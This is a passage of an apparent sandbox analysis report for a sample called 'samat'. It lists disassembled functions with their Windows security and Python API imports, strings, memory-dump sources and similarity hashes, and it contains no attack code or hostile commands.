Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
Instruction ID: cbe752d339cda4b514402ae2a68cbe1883052c87cb2be649235c8fd76e151e2b
Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
Instruction Fuzzy Hash: 76216D22B0C24242FB657332DD6737DD14A6F497A0F804636D83E47ACADEBDE4118326

Function 00007FF8B7E88870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88886
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E8889F

Strings

:GetSecurityDescriptorSacl, xrefs: 00007FF8B7E8887F
GetSecurityDescriptorSacl - invalid sd, xrefs: 00007FF8B7E888AB
GetSecurityDescriptorSacl, xrefs: 00007FF8B7E888DB

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DescriptorParseSecurityTupleValid
String ID: :GetSecurityDescriptorSacl$GetSecurityDescriptorSacl$GetSecurityDescriptorSacl - invalid sd
API String ID: 1292091245-3167575759
Opcode ID: 51e9e47e3c590d4bcffd20fb1b34e3be24bc56202da4389d4add24541a4b39de
Instruction ID: 2eaf3aecc7df46e98ef57867f8065537d808c4d779c0bf2b0a71060de1ede0a9
Opcode Fuzzy Hash: 51e9e47e3c590d4bcffd20fb1b34e3be24bc56202da4389d4add24541a4b39de
Instruction Fuzzy Hash: 4E112CA6E2874282FB558B5DE8402BD63A0AF85FD4F884435DF0D463B6EE3CE599C710

Function 00007FF8B7E887A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E887B6
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E887CF

Strings

GetSecurityDescriptorDacl, xrefs: 00007FF8B7E8880B
SetSecurityDescriptorGroup - invalid sd, xrefs: 00007FF8B7E887DB
:GetSecurityDescriptorDacl, xrefs: 00007FF8B7E887AF

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DescriptorParseSecurityTupleValid
String ID: :GetSecurityDescriptorDacl$GetSecurityDescriptorDacl$SetSecurityDescriptorGroup - invalid sd
API String ID: 1292091245-161903415
Opcode ID: a70b8841fd3bb74fb48fc43b83994f4796f0aa5c67d2f1f93a678df09f3010b5
Instruction ID: 1bea2b1e0e09c3652626a01ec327c98b74569b9968d5c6399d2d81b985fa97de
Opcode Fuzzy Hash: a70b8841fd3bb74fb48fc43b83994f4796f0aa5c67d2f1f93a678df09f3010b5
Instruction Fuzzy Hash: 68113D66E2874292FB458B9DE8402BD63A1AF84FD4F884035DF0D463B6EE3CD595CB10

Function 00007FF8B7E886E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E886F6
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E8870F

Strings

GetSecurityDescriptorGroup - invalid sd, xrefs: 00007FF8B7E8871B
GetSecurityDescriptorGroup, xrefs: 00007FF8B7E88746
:GetSecurityDescriptorGroup, xrefs: 00007FF8B7E886EF

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DescriptorParseSecurityTupleValid
String ID: :GetSecurityDescriptorGroup$GetSecurityDescriptorGroup$GetSecurityDescriptorGroup - invalid sd
API String ID: 1292091245-1740808346
Opcode ID: de9d71227a1b018458c6f32488d96044086d18eae158601c7319b79526419fff
Instruction ID: 8b1e773ffcf44ebc1b2dbdfd79a1fe8c892aaf2af06d1ca2b2edd7fbae9db13b
Opcode Fuzzy Hash: de9d71227a1b018458c6f32488d96044086d18eae158601c7319b79526419fff
Instruction Fuzzy Hash: 2C114262E1870282FB549B9EE85027D22A1AF85FC4F885031DF0D863B6EE3DD9D5C710

Function 00007FF8B7E898A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B7E896D0: IsValidSid.ADVAPI32 ref: 00007FF8B7E896E6

GetLastError.KERNEL32 ref: 00007FF8B7E898C1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E898F0

Strings

PySID: Invalid SID, xrefs: 00007FF8B7E898CC
PySID:, xrefs: 00007FF8B7E8990F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: ErrorLastValidmalloc
String ID: PySID:$PySID: Invalid SID
API String ID: 814871005-2976353951
Opcode ID: bca7d20094dae963d8d92a0c666da5fa3ed3a1cb4ec8201cbe5f052b776f9036
Instruction ID: 1e68782e466ee7957265cf9f612cb43a7f80f39acfae73ec8887b0faf24033e4
Opcode Fuzzy Hash: bca7d20094dae963d8d92a0c666da5fa3ed3a1cb4ec8201cbe5f052b776f9036
Instruction Fuzzy Hash: E1218B62A18B8682EB448B59E4441BD6361EF44FE0F846131EB2E037A5DF3CD494C700

Function 00007FF8B7E842F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8431E
GetAuditedPermissionsFromAclW.ADVAPI32 ref: 00007FF8B7E8434E
Py_BuildValue.PYTHON313 ref: 00007FF8B7E84378
PyMem_Free.PYTHON313 ref: 00007FF8B7E84392

Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA

Strings

O:GetAuditedPermissionsFromAcl, xrefs: 00007FF8B7E84304
GetAuditedPermissionsFromAcl, xrefs: 00007FF8B7E8435A

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: BuildFreeValue$Arg_AuditedDecodeErr_ErrorFormatFromLastLocalMem_MessageObjectParsePermissionsTupleUnicode_
String ID: GetAuditedPermissionsFromAcl$O:GetAuditedPermissionsFromAcl
API String ID: 779572743-1982696749
Opcode ID: 6b9190123efeffe16bc3b1fe5c1430e533b7fa5cc7966d83ebfbad101224fffd
Instruction ID: bbdd1b6690ab80b505b7813037967668a0684617586be32c3152b2425857e680
Opcode Fuzzy Hash: 6b9190123efeffe16bc3b1fe5c1430e533b7fa5cc7966d83ebfbad101224fffd
Instruction Fuzzy Hash: 7711FC72A0874692EB108F5AE4400AEA7A0FF85BD4F844036EB4E47669DF7CE545CB40

Function 00007FF8B7E81240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E81288
PyObject_GetBuffer.PYTHON313 ref: 00007FF8B7E812A6
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E812C6
PyErr_Format.PYTHON313 ref: 00007FF8B7E812E0

Strings

Buffer cannot be None, xrefs: 00007FF8B7E8127E
Buffer length can be at most %d characters, xrefs: 00007FF8B7E812D3

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$BufferBuffer_FormatObject_ReleaseString
String ID: Buffer cannot be None$Buffer length can be at most %d characters
API String ID: 3539591379-686265896
Opcode ID: 0da5e900bf8a33f3c475dd51dd89b2333c16a9d0b82ae7c2ec69a96980702169
Instruction ID: c151474359ff0803658686034f71050b3eb2f208f5b3683d2280b354cc00ff51
Opcode Fuzzy Hash: 0da5e900bf8a33f3c475dd51dd89b2333c16a9d0b82ae7c2ec69a96980702169
Instruction Fuzzy Hash: 1C110762A19B0282EF148B9AA84463C62A1EF89FD4F485035EE5E867B5DF3CE495C300

Function 00007FF8B7E83C60 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 49COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E83C7B
GetAce.ADVAPI32 ref: 00007FF8B7E83C9A

Strings

l:GetAce, xrefs: 00007FF8B7E83C71
GetAce, xrefs: 00007FF8B7E83CA6
Ace type %d is not supported yet, xrefs: 00007FF8B7E83E62

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: Ace type %d is not supported yet$GetAce$l:GetAce
API String ID: 3371842430-2172617993
Opcode ID: c9224e87bc8317b6439b7db474916c839e8cf08f52e6895d905d1aca719b8969
Instruction ID: 31a1de3b490d290125ca70a0c1e1942661429b2f543b704a11e7c3049029822f
Opcode Fuzzy Hash: c9224e87bc8317b6439b7db474916c839e8cf08f52e6895d905d1aca719b8969
Instruction Fuzzy Hash: AE110D72A08B4282EB018B59E84007D73A5FF85FC4F944132DB5D536B9DE3CE565CB10

Function 00007FF8B7E84230 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8425A
GetEffectiveRightsFromAclW.ADVAPI32 ref: 00007FF8B7E84285
Py_BuildValue.PYTHON313 ref: 00007FF8B7E842AA
PyMem_Free.PYTHON313 ref: 00007FF8B7E842C4

Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA

Strings

O:GetEffectiveRightsFromAcl, xrefs: 00007FF8B7E84245
GetEffectiveRightsFromAcl, xrefs: 00007FF8B7E84291

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: BuildFreeValue$Arg_DecodeEffectiveErr_ErrorFormatFromLastLocalMem_MessageObjectParseRightsTupleUnicode_
String ID: GetEffectiveRightsFromAcl$O:GetEffectiveRightsFromAcl
API String ID: 2073598658-568366055
Opcode ID: 247de53edbba7a4271bbf513ae11bb24d89cab06e9711837b0c51d0caff24205
Instruction ID: 59feafb8e103d7bdc32a6259f83bd9f7acf14101436ba55bc337aa763fd3ded2
Opcode Fuzzy Hash: 247de53edbba7a4271bbf513ae11bb24d89cab06e9711837b0c51d0caff24205
Instruction Fuzzy Hash: 22114C22A0C74692EB409F9AF4401BEA3A0FF89BD4F844132EB5E47669DF7CE555CB00

Function 00007FF7E12E7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7E12E7D9D
GetLastError.KERNEL32 ref: 00007FF7E12E7DA9
CloseHandle.KERNEL32 ref: 00007FF7E12E7DC1
CreateFileW.KERNEL32 ref: 00007FF7E12E7DEC
WriteConsoleW.KERNEL32 ref: 00007FF7E12E7E0B

Strings

CONOUT$, xrefs: 00007FF7E12E7DCD

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: bfea000aa6e60dccb14b08a83649aad203dbd2a48a814ffa7f3037fccc8b588b
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 2F11B131B18A4182E751AB52EC46329A2A8FB88BF4F844236EA5DC7794CFBCD8108751

Function 00007FF8B7E82BC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E82BE4
PyErr_Clear.PYTHON313 ref: 00007FF8B7E82BFB
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E82C1F

Strings

llO:AddAccessDeniedAce, xrefs: 00007FF8B7E82C18
AddAccesDeniedAce, xrefs: 00007FF8B7E82C40
lO:AddAccessDeniedAce, xrefs: 00007FF8B7E82BDD

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple$ClearErr_
String ID: AddAccesDeniedAce$lO:AddAccessDeniedAce$llO:AddAccessDeniedAce
API String ID: 2492218514-45297876
Opcode ID: 9257cef95fa0abca0fdc74fa17bf64a4a18db8c9670460e5b188c7a4c9a2dfc3
Instruction ID: f912f4069784d5c94e60c49d58f5de6dbbf1f4eb44093d34188177df1f2037fb
Opcode Fuzzy Hash: 9257cef95fa0abca0fdc74fa17bf64a4a18db8c9670460e5b188c7a4c9a2dfc3
Instruction Fuzzy Hash: B911FB72A08B4692EB108B59F4404AEB764FF88BC4F444132EB8D47B69DE3CE654CB40

Function 00007FF8B7E82B10 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E82B34
PyErr_Clear.PYTHON313 ref: 00007FF8B7E82B4B
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E82B6F

Strings

lO:AddAccessAllowedAce, xrefs: 00007FF8B7E82B2D
AddAccesAllowedAce, xrefs: 00007FF8B7E82B90
llO:AddAccessAllowedAce, xrefs: 00007FF8B7E82B68

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple$ClearErr_
String ID: AddAccesAllowedAce$lO:AddAccessAllowedAce$llO:AddAccessAllowedAce
API String ID: 2492218514-648165593
Opcode ID: 3ef4422c3111dd9ae3b784dbffad1bbc340a2c81814f7b2475e4556d86d72b89
Instruction ID: 150cb7c87e6295f20876a5cad18b65d51edde0b11844a2b6298c5e605bc8ef4b
Opcode Fuzzy Hash: 3ef4422c3111dd9ae3b784dbffad1bbc340a2c81814f7b2475e4556d86d72b89
Instruction Fuzzy Hash: C811FE76A08B4692EB508F59F4404AEB7A4FF88BD4F444032EB8D43B29EE3CD654CB40

Function 00007FF8B7E889E0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E88A07
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88A29
SetSecurityDescriptorControl.ADVAPI32 ref: 00007FF8B7E88A42

Strings

SetSecurityDescriptorControl, xrefs: 00007FF8B7E88A4E
SetSecurityDescriptorControl does not exist on this platform, xrefs: 00007FF8B7E889FD
ll:SetSecurityDescriptorControl, xrefs: 00007FF8B7E88A22

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ControlDescriptorErr_ParseSecurityStringTuple
String ID: SetSecurityDescriptorControl$SetSecurityDescriptorControl does not exist on this platform$ll:SetSecurityDescriptorControl
API String ID: 1690190277-853495732
Opcode ID: ca04b7d0fea14b1eeca76fa55091ac8873dd5a18c7a071162c64d02978383f12
Instruction ID: d12d46b6b902b6d13b35d7fecb4a17b6d5e79093eac7f09a8ac594239f2998a6
Opcode Fuzzy Hash: ca04b7d0fea14b1eeca76fa55091ac8873dd5a18c7a071162c64d02978383f12
Instruction Fuzzy Hash: B1110C62A2874682EB548F5DE88027D23A1FF85FC4F484071EB4D467B5DE3CE595C710

Function 00007FF8B7E83CF6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_Py_NewReference.PYTHON313 ref: 00007FF8B7E83D38
GetLengthSid.ADVAPI32 ref: 00007FF8B7E83D41
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83D4B
CopySid.ADVAPI32 ref: 00007FF8B7E83D5D
Py_BuildValue.PYTHON313 ref: 00007FF8B7E83D7B

Strings

(ll)lN, xrefs: 00007FF8B7E83D68

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: BuildCopyLengthReferenceValuemalloc
String ID: (ll)lN
API String ID: 1144616375-415220060
Opcode ID: e8749222804a17c14589da8d80a8dfa4130c09778a5ed6446d50b6ac359eea1b
Instruction ID: 161e080d4ddfd8ea495c8b3dc643702e4b1ec0f30efaf99edeee87085a77b108
Opcode Fuzzy Hash: e8749222804a17c14589da8d80a8dfa4130c09778a5ed6446d50b6ac359eea1b
Instruction Fuzzy Hash: 3A113632A08B928AEB648F59A44022C73A0FF49FC0F584035EB8E537B5EF3CE5658740

Function 00007FF8B7E8A720 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON313(?,?,00000000,00007FF8B7E8A1B2), ref: 00007FF8B7E8A72F
PyErr_Clear.PYTHON313(?,?,00000000,00007FF8B7E8A1B2), ref: 00007FF8B7E8A767
PyErr_SetString.PYTHON313(?,?,00000000,00007FF8B7E8A1B2), ref: 00007FF8B7E8A77E
_Py_Dealloc.PYTHON313(?,?,00000000,00007FF8B7E8A1B2), ref: 00007FF8B7E8A792

Strings

invalid timestamp, xrefs: 00007FF8B7E8A774
(i), xrefs: 00007FF8B7E8A728

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$BuildClearDeallocStringValue
String ID: (i)$invalid timestamp
API String ID: 3614533335-2037815563
Opcode ID: 64888a64718f88c2b21e33994be5d13bf83f3b1d82c56865ddfd3e790820648b
Instruction ID: 2c8af2a2797254cc1d890c40eb55a2f03f7b3402977130959893a0b09f8d0229
Opcode Fuzzy Hash: 64888a64718f88c2b21e33994be5d13bf83f3b1d82c56865ddfd3e790820648b
Instruction Fuzzy Hash: 9B012C66E09B0681FB158B6EE84413C23B0AF59FC5F481032DA0E02775DE3CE4848700

Function 00007FF8B7E84A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36COMMON

